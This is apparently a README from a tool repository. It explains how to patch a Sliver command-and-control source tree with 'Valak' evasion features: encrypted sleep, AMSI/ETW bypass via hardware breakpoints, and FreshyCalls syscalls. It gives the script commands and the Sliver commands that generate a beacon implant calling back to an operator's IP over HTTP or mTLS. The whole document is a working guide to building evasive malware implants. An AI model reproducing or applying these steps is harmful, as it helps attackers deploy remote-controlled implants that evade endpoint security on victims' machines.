Files
Valak/docs/sliver-integration.md
T
2026-07-18 09:30:00 +01:00

1.9 KiB

Valak + Sliver integration

One script. Three prereqs. Your implant walks out with ChaCha20-encrypted sleep, HWBP AMSI/ETW bypass, and FreshyCalls syscalls.

prereqs

  • Zig — any build targeting x86_64-windows (Linux zig or Windows zig via WSL)
  • Go 1.21+ — with a Sliver source clone on disk
  • python3 — used by the embed script

usage

from the Valak repo root, point it at your Sliver clone:

./scripts/integrate.sh ~/projects/sliver

that builds the DLL, embeds it, patches runner.go, and verifies the patches compile. The actual implant is generated from sliver-server (see below).

options

flag what it does
--skip-build patch only, don't build the implant
ZIG=/path/to/zig use a specific zig binary (e.g. Windows zig from WSL)

examples:

# patch only
./scripts/integrate.sh ~/projects/sliver --skip-build

# windows zig on WSL
ZIG=/mnt/c/Zig/zig.exe ./scripts/integrate.sh ~/projects/sliver

generating the implant

after the script patches your clone, generate the implant from sliver-server:

# start sliver
sliver-server

# on the server REPL:
sliver > profiles new --beacon --http <YOUR_IP> valak
sliver > generate --profile valak --save /tmp/valak.exe

# or with mtls:
sliver > generate --mtls <YOUR_IP> --save /tmp/valak.exe

the generated binary includes Valak's encrypted sleep, AMSI/ETW bypass, and FreshyCalls syscalls automatically. The patched runner.go is inherited through Sliver's template processing.

idempotent

running the script twice on the same clone is safe — it detects existing patches and skips them.

notes

  • beacon mode only — encrypted sleep hooks beaconMainLoop. Session mode blocks on connection receive, so evasion there is AMSI/ETW bypass and FreshyCalls only.
  • one-time initBootstrap() goes in beaconMainLoop (runs once per beacon connection), not beaconMain (runs every check-in).